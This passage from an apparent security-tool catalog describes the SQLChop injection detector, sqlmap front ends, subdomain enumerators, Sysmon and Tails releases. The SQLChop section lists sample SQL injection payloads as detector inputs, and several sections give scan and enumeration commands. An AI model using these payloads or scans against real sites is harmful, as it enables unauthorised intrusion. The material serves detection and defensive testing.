Enjoy!

SQLChop Python API

The current alpha testing release is provided as a Python library. C++ headers and examples will be released soon.
The following APIs are the main interfaces SQLChop exports.

is_sqli
Given a raw payload, determine whether the payload is an SQL injection payload.
Parameter: string
Return value: bool; returns True for an SQLi payload, False for the normal case.
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.is_sqli('SELECT 1 From users')
True
>>> detector.is_sqli("' or '1'='1")
True
>>> detector.is_sqli('select the best student from classes as the student union representative')
False
>>> detector.is_sqli('''(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/''')
True

classify
Given a web application input, the classify API decodes the input and finds possible SQL injection payloads inside. If SQLi payloads are found, they are listed.
Parameter 1: object with the following keys
1. urlpath: string, the URL path of the web request
2. body: string, the HTTP body of a POST/PUT request
3. cookie: string, the cookie content of the web request
4. raw: string, any other general field that needs general decoding.
Parameter 2: detail; if detail is True, a detailed payload list is returned; if False, only the result is returned, which runs faster.
Return: an object containing result and payloads
1. result: int, a positive value indicates the web request contains an SQL injection payload
2. payloads: list of objects containing key, score, value and source
key: string, reserved
source: string, shows where this payload is embedded in the original web request and how the payload was decoded
value: the decoded SQLi payload
score: the score of the decoded SQLi payload

Examples:
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.classify({'urlpath': '/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg=='}, True)
{
  'payloads': [{
    'key': '',
    'score': 4.070000171661377,
    'source': 'urlpath: querystring_decode b64decode url_decode ',
    'value': '-1 and 1=2 union select 1,2,3,chr(106),5,6,7,8,9,10,11,12 from admin'
  }],
  'result': 1
}
>>> detector.classify({'body': 'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&arrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&arrs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arrs1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arrs1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arrs1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&arrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
{
  'payloads': [{
    'key': '',
    'score': 3.9800000190734863,
    'source': 'body: querystring_decode ',
    'value': "SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)-- '"
  }, {
    'key': '',
    'score': 2.0899999141693115,
    'source': 'body: querystring_decode ',
    'value': "'SQL inject' and Password"
  }, {
    'key': '',
    'score': 2.180000066757202,
    'source': 'body: querystring_decode ',
    'value': "(SELECT @@VERSION)-- '"
  }, {
    'key': '',
    'score': 0.0,
    'source': 'body: querystring_decode ',
    'value': 'saveedit'
  }],
  'result': 1
}

Customization
The is_sqli API (in sqlchop.py) detects SQLi using a score of 2.1 as the threshold; you can adjust this threshold according to your usage scenario.
def is_sqli(self, payload):
    ret = self.score_sqli(payload)
    return ret > 2.1  # here you can modify and test this threshold

def classify(self, request, detail=False):
    ...
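The decoding chain that the 'source' strings above record (querystring_decode, b64decode, url_decode, plus reassembly of a PHP-style array of chr() codes) can be reproduced in a few dozen lines. This is an added illustration written for this page, not SQLChop's own code: it recovers the two payloads shown above from the same sample requests, and its sql_hint() is only a crude keyword stand-in for SQLChop's tokenizer-based scoring.

```python
"""Layered decoding of web input, modelled on the 'source' strings in
SQLChop's classify() output ('urlpath: querystring_decode b64decode
url_decode ', 'body: querystring_decode ').  Added illustration, not
SQLChop's code: it reproduces the decoding stages so the payloads in the two
sample requests above become visible.  It does not reimplement SQLChop's
tokenizer or scoring; sql_hint() is only a crude keyword stand-in."""
import base64
import binascii
import re
from urllib.parse import parse_qsl, unquote, urlsplit

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Crude keyword check.  Deliberately naive: it also flags the English
# sentence about 'the student union', which SQLChop's parser rejects.
SQL_HINT_RE = re.compile(r"\bunion\s+select\b|\bselect\b.*\bfrom\b|\bsleep\s*\(|@@|--", re.I)

# Sample inputs taken from the classify() examples above.  The body is
# rebuilt from its arrs1[] character codes so that it fits on a few lines.
SAMPLE_URLPATH = ("/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGN"
                  "ocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==")
_CODES = [83, 69, 76, 69, 67, 84, 32, 42, 32, 70, 114, 111, 109, 32, 84, 97, 98,
          108, 101, 32, 87, 72, 69, 82, 69, 32, 78, 97, 109, 101, 61, 39, 83, 81,
          76, 32, 105, 110, 106, 101, 99, 116, 39, 32, 97, 110, 100, 32, 80, 97,
          115, 115, 119, 111, 114, 100, 61, 39, 39, 32, 97, 110, 100, 32, 67, 111,
          114, 112, 61, 39, 39, 32, 111, 114, 32, 49, 61, 40, 83, 69, 76, 69, 67,
          84, 32, 64, 64, 86, 69, 82, 83, 73, 79, 78, 41, 45, 45, 32, 39]
SAMPLE_BODY = "opt=saveedit&" + "&".join(f"arrs1[]={c}" for c in _CODES)


def join_char_codes(values):
    """A repeated PHP-style array parameter whose every element is a small
    integer (arrs1[]=83&arrs1[]=69...) is a string smuggled as chr() codes;
    return it reassembled, or None when the values are not all such codes."""
    if len(values) < 2 or not all(v.isdigit() and 0 < int(v) < 128 for v in values):
        return None
    return "".join(chr(int(v)) for v in values)


def try_b64decode(text):
    """The UTF-8 text behind a base64 value, or None if it is not well-formed
    base64 (too short, bad length or alphabet) or does not decode to text."""
    if len(text) < 8 or len(text) % 4 or not B64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_field(field, raw):
    """(source, value) candidates for one request field.  'source' names the
    field and the decoders applied, like SQLChop's source strings.  parse_qsl
    already performs one round of percent-decoding; 'url_decode' is recorded
    when a decoded layer (here base64) exposes a further round of %xx escapes."""
    qs = urlsplit(raw).query if field == "urlpath" else raw
    grouped = {}
    for key, val in parse_qsl(qs, keep_blank_values=True):
        grouped.setdefault(key, []).append(val)
    out = []
    for values in grouped.values():
        joined = join_char_codes(values)
        if joined is not None:
            out.append((f"{field}: querystring_decode ", joined))
            continue
        for val in values:
            chain = f"{field}: querystring_decode "
            inner = try_b64decode(val)
            if inner is not None:
                chain += "b64decode "
                val = inner
            if "%" in val:
                chain += "url_decode "
                val = unquote(val)
            out.append((chain, val))
    return out


def decode_request(request):
    """Decode every supported field of a classify()-style request dict."""
    out = []
    for field in ("urlpath", "body", "cookie", "raw"):
        if field in request:
            out.extend(decode_field(field, request[field]))
    return out


def sql_hint(value):
    """True when a decoded value shows obvious SQL syntax.  A hint only:
    SQLChop's decision comes from tokenizing and parsing the value."""
    return SQL_HINT_RE.search(value) is not None
```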

Download SQLChop
SQLIPY - PLUGIN FOR BURP SUITE THAT INTEGRATES
SQLMAP USING THE SQLMAP API

SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.

SQLMap comes with a RESTful server that will execute SQLMap scans. This plugin can start the API for you or connect to an already running API to perform a scan.

Requirements

Jython 2.7 beta, due to the use of json
Java 1.7 or 1.8 (the beta version of Jython 2.7 requires this)

Usage

SQLiPy relies on a running instance of the SQLMap API server. You can manually start the server with:
python sqlmapapi.py -s -H <ip> -p <port>

Or, you can use the SQLMap API tab to select the IP/port on which to run, as well as the path to python and sqlmapapi.py on your system.
Once the SQLMap API is running, it is just a matter of right-clicking in the 'Request' sub tab of either the Target or Proxy main tabs and choosing 'SQLiPy Scan'.
This will populate the SQLMap Scanner tab of the plugin with information about that request. Clicking the 'Start Scan' button will execute a scan.
If the page is vulnerable to SQL injection, then a thread from the plugin will poll the results and add them to the Scanner Results tab.
Read more here.

Download SQLiPy
SQLMAP-WEB-GUI - WEB GUI TO DRIVE NEAR FULL FUNCTIONALITY OF SQLMAP

PHP frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!
Here are a few quick videos to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.
Demo against: Windows 2003 Server, IIS/6.0 + ASP + MSSQL 2005


Demo against: Linux (CentOS), Apache, MySQL, PHP


Requirements:

Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use Google)
PHP 5.3+ is suggested; older versions not tested, so mileage may vary
Python and any SQLMAP dependencies (refer to their wiki for any help there)
Clone this repo to your machine
Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
When you want to use it, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
Then you can navigate to the Web GUI address in your browser to begin (firefox http://127.0.0.1/sqlmap/index.php)

Download SQLMAP-Web-GUI
SQUERT - A SIMPLE QUERY AND REPORT TOOL

Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.
Intro Video:


Requirements

Sguil 0.9.0 http://sguil.net. If you use Security Onion http://securityonion.blogspot.ca you can get everything set up rather quickly.
PHP55 with CLI
mysql
TCL, TclX
mysqltcl
uri
ftp
ftp::geturl
md5
MySQL client

Download Squert
SUBBRUTE - SUBDOMAIN BRUTEFORCER
SubBrute is a community driven project with the goal of creating the fastest and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting (https://www.us-cert.gov/ncas/alerts/TA13-088A). This design also provides a layer of anonymity, as SubBrute does not send traffic directly to the target's name servers.

What's new in v1.1?

This version merges pull requests from the community; changes from JordanMilne, KxCode and rc0r are in this release. In SubBrute 1.1 we fixed bugs and improved accuracy and efficiency. As requested, this project is now GPLv3.
Accuracy and better wildcard detection:
A new filter that can pick up geolocation-aware wildcards.
Filter misbehaving nameservers.
Faster:
More than 2,000 high quality nameservers were added to resolvers.txt; these servers will resolve multiple queries in under 1 sec.
Nameservers are verified when they are needed. A separate thread is responsible for creating a feed of nameservers and the corresponding wildcard blacklist.
New output:
-a will list all addresses associated with a subdomain.
-v debug output, to help developers/hackers debug subbrute.
-o output results to file.

More Information

The 'names.txt' list was created using some creative Google hacks with additions from the community. SubBrute has a feature to build your own subdomain lists by matching subdomains with a regular expression and sorting by frequency of occurrence:
python subroute.py -f full.html > my_subs.txt
names.txt contains 31298 subdomains. subs_small.txt was stolen from fierce2 and contains 1896 subdomains. If you find more subdomains to add, open a bug report or pull request and I'll be happy to add them.
No install required for Windows, just cd into the 'windows' folder:
subbrute.exe google.com
Easy to install: you just need http://www.dnspython.org/ and python2.7 or python3. This tool should work under any operating system: bsd, osx, windows, linux...
(On a side note, giving a makefile root always bothers me; it would be a great way to install a backdoor...)
Under Ubuntu/Debian all you need is:
sudo apt-get install python-dnspython
On other operating systems you may have to install dnspython manually:
http://www.dnspython.org/
Easy to use:
./subbrute.py google.com
Tests multiple domains:
./subbrute.py google.com gmail.com blogger.com
or a newline delimited list of domains:
./subbrute.py -t list.txt
Also keep in mind that subdomains can have subdomains (example: _xmpp-server._tcp.gmail.com):
./subbrute.py gmail.com > gmail.out
./subbrute.py -t gmail.out
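As an added illustration of the wildcard filtering described in the v1.1 notes above (not SubBrute's code), the following checks enumeration hits against the answers that random, non-existent labels receive; the resolver is injected and the zone is constructed, so the example runs offline.

```python
"""Wildcard-aware filtering of subdomain enumeration hits.  Added illustration
of the "better wildcard detection" idea in the SubBrute notes above; not
SubBrute's code.  A wildcard record (*.example.test) answers every name, so a
candidate only counts as real when its addresses differ from what names that
cannot exist receive.  The resolver is injected so the demo runs offline
against a constructed zone; in practice it would wrap a dnspython query."""
import itertools
import random
import string


def random_label(length=12):
    """A label that will not exist in any real zone."""
    return "".join(random.choice(string.ascii_lowercase + string.digits)
                   for _ in range(length))


def wildcard_answers(domain, resolve, probes=3):
    """Resolve several random labels under `domain`; every address that comes
    back is a wildcard answer.  More than one probe is used because a
    geolocation- or load-balancing-aware wildcard may return a different
    address each time, so the blacklist is the union of all probe answers."""
    seen = set()
    for _ in range(probes):
        seen.update(resolve(f"{random_label()}.{domain}"))
    return seen


def filter_wildcards(domain, candidates, resolve, probes=3):
    """Return {fqdn: sorted addresses} for candidates whose answers are not
    fully explained by the wildcard.  A real host that happens to share the
    wildcard's address is indistinguishable and is dropped too."""
    wild = wildcard_answers(domain, resolve, probes)
    results = {}
    for label in candidates:
        fqdn = f"{label}.{domain}"
        real = set(resolve(fqdn)) - wild
        if real:
            results[fqdn] = sorted(real)
    return results


# --- constructed zone for the offline demo (not real infrastructure) ------
CONSTRUCTED_ZONE = {
    "www.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.20", "192.0.2.21"],
    "dev.example.test": ["203.0.113.5"],   # parked on a wildcard address
}
WILDCARD_IPS = ["203.0.113.5", "203.0.113.6"]   # geo-aware wildcard pool


def make_fake_resolver(zone, wildcard_ips, apex="example.test"):
    """Resolver returning explicit records, or rotating wildcard answers for
    any other name under the apex (deterministic, so the demo is repeatable)."""
    rotation = itertools.count()

    def resolve(name):
        if name in zone:
            return list(zone[name])
        if name.endswith("." + apex):
            return [wildcard_ips[next(rotation) % len(wildcard_ips)]]
        return []
    return resolve


def demo():
    """Run the filter over a small candidate list against the constructed zone."""
    resolve = make_fake_resolver(CONSTRUCTED_ZONE, WILDCARD_IPS)
    return filter_wildcards("example.test", ["www", "mail", "dev", "nothere"], resolve)
```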

Download SubBrute
SUBDOMAIN ANALYZER - GET DETAILED INFORMATION
OF A DOMAIN

The "SubDomain Analyzer" tool is written in Python. The purpose of "SubDomain Analyzer" is getting full detailed information on a selected domain. The "SubDomain Analyzer" gets data from a domain by the following steps:
1. Trying to get the zone transfer file.
2. Gathering all information from DNS records.
3. Analyzing the DNS records (analyzing all IP addresses from DNS records, testing the class C range of each IP address (for example: 127.0.0.1/24) and getting all data that contains the domain being analyzed).
4. Testing subdomains by dictionary attack.
The Subdomain Analyzer can keep new addresses found in DNS records or by the IP analyzer. The Subdomain Analyzer brings very qualitative information about the domain being analyzed; additionally, it shows a designed report with all the data.

Examples:

Analyzing the example.com domain: subdomain-analyzer.py example.com
Analyzing the example.com domain, saving the records in a log file named log.txt, working with 100 threads and using another dictionary file named another-file.txt: subdomain-analyzer.py example.com --output log.txt --threads 100 --sub-domain-list another-file.txt
Analyzing the example.com domain, saving the records in a log file named log.txt and appending new sub-domains to the sub-domains list file: subdomain-analyzer.py example.com -o log.txt --sub-domain-list

Requirements:

Linux Installation:
1. sudo apt-get install python-dev python-pip
2. sudo pip install -r requirements.txt
3. easy_install prettytable
MacOSX Installation:
1. Install Xcode Command Line Tools (App Store)
2. sudo easy_install pip, prettytable
3. sudo pip install -r requirements.txt
Windows Installation:
1. Install dnspython
2. Install gevent
3. Install prettytable
4. Open Command Prompt (cmd) as Administrator -> go to the python folder -> Scripts (cd c:\Python27\Scripts)
5. pip install -r (Full Path To requirements.txt)
6. easy_install prettytable

Download SubDomain Analyzer
SUMO - SOFTWARE UPDATE MONITOR

SUMo (Software Update Monitor) keeps your PC up-to-date & safe by using the most recent version of your favorite software!
Unlike built-in auto update features, SUMo tells you if updates are available before you need to use your software.

Features

Automatic detection of installed software
Detects required updates / patches for your software
Detects required driver updates (requires DUMo)
Filter / authorize Beta versions (user setting)
Ignore list: only tracks software YOU want to track
More compatibility and fewer false positives than other Update Monitors (according to users' feedback ;-)
Internationalization support.

Download SUMo
SYSMON V2.0 - SYSTEM ACTIVITY MONITOR FOR
WINDOWS

System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.

Note that Sysmon does not provide analysis of the events it generates, nor does it attempt to protect or hide itself from attackers.

Overview of Sysmon Capabilities

Sysmon includes the following capabilities:

Logs process creation with full command line for both current and parent processes.
Records the hash of process image files using SHA1 (the default), MD5, SHA256 or IMPHASH. Multiple hashes can be used at the same time.
Includes a process GUID in process create events to allow for correlation of events even when Windows reuses process IDs.
Includes a session GUID in each event to allow correlation of events on the same logon session.
Logs loading of drivers or DLLs with their signatures and hashes.
Optionally logs network connections, including each connection's source process, IP addresses, port numbers, hostnames and port names.
Detects changes in file creation time to understand when a file was really created. Modification of file create timestamps is a technique commonly used by malware to cover its tracks.
Automatically reloads configuration if changed in the registry.
Rule filtering to include or exclude certain events dynamically.
Generates events from early in the boot process to capture activity made by even sophisticated kernel-mode malware.

Usage

Use Sysmon's simple command-line options to install and uninstall it, as well as to check and modify Sysmon's configuration:

Sysinternals Sysmon v2.00 - System activity monitor
Copyright (C) 2014-2015 Mark Russinovich and Thomas Garnier
Sysinternals - www.sysinternals.com

Usage:
Install:   Sysmon.exe -i <configfile>
           [-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)]
           [-l (<process,...>)]
Configure: Sysmon.exe -c <configfile>
           [--|[-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)]
           [-l (<process,...>)]]
Uninstall: Sysmon.exe -u

-c   Update configuration of an installed Sysmon driver or dump the current configuration if no other argument is provided. Optionally take a configuration file.
-h   Specify the hash algorithms used for image identification (default is SHA1). It supports multiple algorithms at the same time. Configuration entry: Hashing.
-i   Install service and driver. Optionally take a configuration file.
-l   Log loading of modules. Optionally take a list of processes to track. Configuration entry: ImageLoading.
-m   Install the event manifest (done on service install as well).
-n   Log network connections. Optionally take a list of processes to track. Configuration entry: Network.
-u   Uninstall service and driver.

The service logs events immediately and the driver installs as a boot-start driver to capture activity from early in the boot that the service will write to the event log when it starts.
On Vista and higher, events are stored in "Applications and Services Logs/Microsoft/Windows/Sysmon/Operational". On older systems, events are written to the System event log.
If you need more information on configuration files, use the '-? config' command. More examples are available on the Sysinternals website.
Specify -accepteula to automatically accept the EULA on installation, otherwise you will be interactively prompted to accept it.
Neither install nor uninstall requires a reboot.

Examples

Install with default settings (process images hashed with sha1 and no network monitoring)
sysmon -accepteula -i
Install with md5 and sha256 hashing of process created and monitoring network connections
sysmon -accepteula -i -h md5,sha256 -n
Install Sysmon with a configuration file (as described below)
sysmon -accepteula -i c:\windows\config.xml
Uninstall
sysmon -u
Dump the current configuration
sysmon -c
Change the configuration to use all hashes, no network monitoring and monitoring of DLLs in Lsass
sysmon -c -h * -l lsass.exe
Change the configuration of sysmon with a configuration file (as described below)
sysmon -c c:\windows\config.xml
Change the configuration to default settings
sysmon -c --
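As an added example (not part of Sysmon or the Sysinternals tooling), the following joins Sysmon's file-creation-time-change (event ID 2) and network-connection (event ID 3) events back to the owning process-create event (ID 1) by ProcessGuid, the correlation the capability list above describes; the sample events are constructed, and the field names follow Sysmon's event schema.

```python
"""Correlating Sysmon events by ProcessGuid.  Added example, not part of
Sysmon or the Sysinternals tooling: it parses event XML in the shape Sysmon
writes to Microsoft-Windows-Sysmon/Operational and joins file creation time
changes (event ID 2) and network connections (ID 3) back to the process
create event (ID 1) that owns them.  Both constructed processes share
ProcessId 4120: the PID reuse the process GUID exists to disambiguate.
Field names follow Sysmon's event schema; every value is constructed."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

SAMPLE_LOG = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
 <EventData>
  <Data Name="ProcessGuid">{00000000-0000-0000-0000-00000000AAAA}</Data>
  <Data Name="ProcessId">4120</Data>
  <Data Name="Image">C:\Windows\System32\notepad.exe</Data>
  <Data Name="CommandLine">notepad.exe notes.txt</Data>
  <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
 <EventData>
  <Data Name="ProcessGuid">{00000000-0000-0000-0000-00000000BBBB}</Data>
  <Data Name="ProcessId">4120</Data>
  <Data Name="Image">C:\Users\alice\AppData\Local\Temp\update.exe</Data>
  <Data Name="CommandLine">update.exe /silent</Data>
  <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>2</EventID></System>
 <EventData>
  <Data Name="ProcessGuid">{00000000-0000-0000-0000-00000000BBBB}</Data>
  <Data Name="ProcessId">4120</Data>
  <Data Name="TargetFilename">C:\ProgramData\svc.dll</Data>
  <Data Name="CreationUtcTime">2009-07-14 02:38:00.000</Data>
  <Data Name="PreviousCreationUtcTime">2015-03-01 10:05:01.000</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>3</EventID></System>
 <EventData>
  <Data Name="ProcessGuid">{00000000-0000-0000-0000-00000000BBBB}</Data>
  <Data Name="ProcessId">4120</Data>
  <Data Name="DestinationIp">203.0.113.7</Data>
  <Data Name="DestinationPort">443</Data>
 </EventData>
</Event>
</Events>"""


def parse_events(xml_text):
    """Yield (event_id, {field: value}) for every <Event> in an export."""
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        eid = int(ev.find("e:System/e:EventID", NS).text)
        data = {d.get("Name"): (d.text or "")
                for d in ev.findall("e:EventData/e:Data", NS)}
        yield eid, data


def correlate(xml_text):
    """Attach ID 2 and ID 3 events to their process by ProcessGuid, not by
    ProcessId: both processes above are PID 4120, and only the GUID says which
    one rewrote the file's timestamp and opened the connection."""
    procs, findings = {}, []
    for eid, d in parse_events(xml_text):
        if eid == 1:
            procs[d["ProcessGuid"]] = d
        elif eid in (2, 3):
            owner = procs.get(d["ProcessGuid"], {})
            rec = {"event_id": eid, "pid": d.get("ProcessId"),
                   "image": owner.get("Image"),
                   "command_line": owner.get("CommandLine"),
                   "parent": owner.get("ParentImage")}
            if eid == 2:
                rec.update(kind="file_time_changed", target=d["TargetFilename"],
                           previous=d["PreviousCreationUtcTime"],
                           new=d["CreationUtcTime"])
            else:
                rec.update(kind="network_connect",
                           dest=f"{d['DestinationIp']}:{d['DestinationPort']}")
            findings.append(rec)
    return findings


def backdated(findings):
    """File time changes that move the creation time into the past, the
    track-covering pattern the text describes.  Sysmon timestamps are
    'YYYY-MM-DD HH:MM:SS.mmm', so string order is time order."""
    return [f for f in findings
            if f["kind"] == "file_time_changed" and f["new"] < f["previous"]]
```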

Download Sysmon v2.0
TAILS 1.3 - THE AMNESIC INCOGNITO LIVE SYSTEM

Tails is a live operating system that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
use the Internet anonymously and circumvent censorship; all connections to the Internet are forced to go through the Tor network;
leave no trace on the computer you are using unless you ask it explicitly;
use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.

Tails, The Amnesic Incognito Live System, version 1.3, is out.
This release fixes numerous security issues and all users must upgrade as soon as possible.

New features

Electrum is an easy to use bitcoin wallet. You can use the Bitcoin Client persistence feature to store your Electrum configuration and wallet.
The Tor Browser has additional operating system and data security. This security restricts reads and writes to a limited number of folders. Learn how to manipulate files with the new Tor Browser.
The obfs4 pluggable transport is now available to connect to Tor bridges. Pluggable transports transform the Tor traffic between the client and the bridge to help disguise Tor traffic from censors.
Keyringer lets you manage and share secrets using OpenPGP and Git from the command line.

Upgrades and changes

The Mac and Linux manual installation processes no longer require the isohybrid command. Removing the isohybrid command simplifies the installation.
The tap-to-click and two-finger scrolling trackpad settings are now enabled by default. This should be more intuitive for Mac users.
The Ibus Vietnamese input method is now supported.
Improved support for OpenPGP smartcards through the installation of GnuPG 2.

There are numerous other changes that may not be apparent in the daily operation of a typical user. Technical details of all the changes are listed in the Changelog.

Download Tails 1.3
TAILS 1.4 - THE AMNESIC INCOGNITO LIVE SYSTEM

Tails is a live operating system that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
use the Internet anonymously and circumvent censorship; all connections to the Internet are forced to go through the Tor network;
leave no trace on the computer you are using unless you ask it explicitly;
use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.

Tails, The Amnesic Incognito Live System, version 1.4, is out.

New features

Tor Browser 4.5 now has a security slider that you can use to disable browser features, such as JavaScript, as a trade-off between security and usability. The security slider is set to low by default to provide the same level of security as previous versions and the most usable experience.
We disabled in Tails the new circuit view of Tor Browser 4.5 for security reasons. You can still use the network map of Vidalia to inspect your circuits.
Tails OpenPGP Applet now has a shortcut to the gedit text editor, thanks to Ivan Bliminse.
Paperkey lets you print a backup of your OpenPGP secret keys on paper.

Upgrades and changes

Tor Browser 4.5 protects better against third-party tracking. Often when visiting a website, many connections are created to transfer both the content of the main website (its page, images, and so on) and third-party content from other websites (advertisements, Like buttons, and so on). In Tor Browser 4.5, all such content, from the main website as well as the third-party websites, goes through the same Tor circuits. And these circuits are not reused when visiting a different website. This prevents third-party websites from correlating your visits to different websites.
Tor Browser 4.5 now keeps using the same Tor circuit while you are visiting a website. This prevents the website from suddenly changing language, behavior, or logging you out.
Disconnect is the new default search engine. Disconnect provides Google search results to Tor users without captchas or bans.
Better support for Vietnamese in LibreOffice through the installation of fonts-linuxlibertine.
Disable security warnings when connecting to POP3 and IMAP ports that are mostly used for StartTLS nowadays.
Support for more printers through the installation of printer-driver-gutenprint.
Upgrade Tor to 0.2.6.7.
Upgrade I2P to 0.9.19, which has several fixes and improvements for floodfill performance.
Remove the obsolete #i2p-help IRC channel from Pidgin.
Remove the command line email client mutt and msmtp.

There are numerous other changes that might not be apparent in the daily operation of a typical user. Technical details of all the changes are listed in the Changelog.

Fixed problems

Make the browser theme of the Windows 8 camouflage compatible with the Unsafe Browser and the I2P Browser.
Remove the Tor Network Settings... from the Torbutton menu.
Better support for Chromebook C720-2800 through the upgrade of syslinux.
Fix the localization of Tails Upgrader.
Fix the OpenPGP key servers configured in Seahorse.
Prevent Tor Browser from crashing when Orca is enabled.

Download Tails 1.4
TAILS 1.7 - THE AMNESIC INCOGNITO LIVE SYSTEM

Tails is a live operating system that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
use the Internet anonymously and circumvent censorship; all connections to the Internet are forced to go through the Tor network;
leave no trace on the computer you are using unless you ask it explicitly;
use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.

Tails, The Amnesic Incognito Live System, version 1.7, is out.
This release fixes numerous security issues. All users must upgrade as soon as possible.

NEW FEATURES

You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents.
We added Icedove, a rebranded version of the Mozilla Thunderbird email client. Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove.

UPGRADES AND CHANGES

Improve the wording of the first screen of Tails Installer.
Restart Tor automatically if connecting to the Tor network takes too long. (#9516)
Update several firmware packages which might improve hardware compatibility.
Update the Tails signing key which is now valid until 2017.
Update Tor Browser to 5.0.4.
Update Tor to 0.2.7.4.

FIXED PROBLEMS

Prevent wget from leaking the IP address when using the FTP protocol. (#10364)
Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333)
Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades.
Make the "I2P is ready" notification more reliable.

Download Tails 1.7
TCPCRYPT - ENCRYPTING THE INTERNET

Tcpcrypt is a protocol that attempts to encrypt (almost) all of


your network traffic. Unlike other security mechanisms,
Tcpcrypt works out of the box: it requires no configuration, no
changes to applications, and your network connections will
continue to work even if the remote end does not support
Tcpcrypt, in which case connections will gracefully fall back to
standard clear-text TCP. Install Tcpcrypt and you'll feel no

difference in your every day user experience, but yet your traffic
will be more secure and you'll have made life much harder for
hackers.
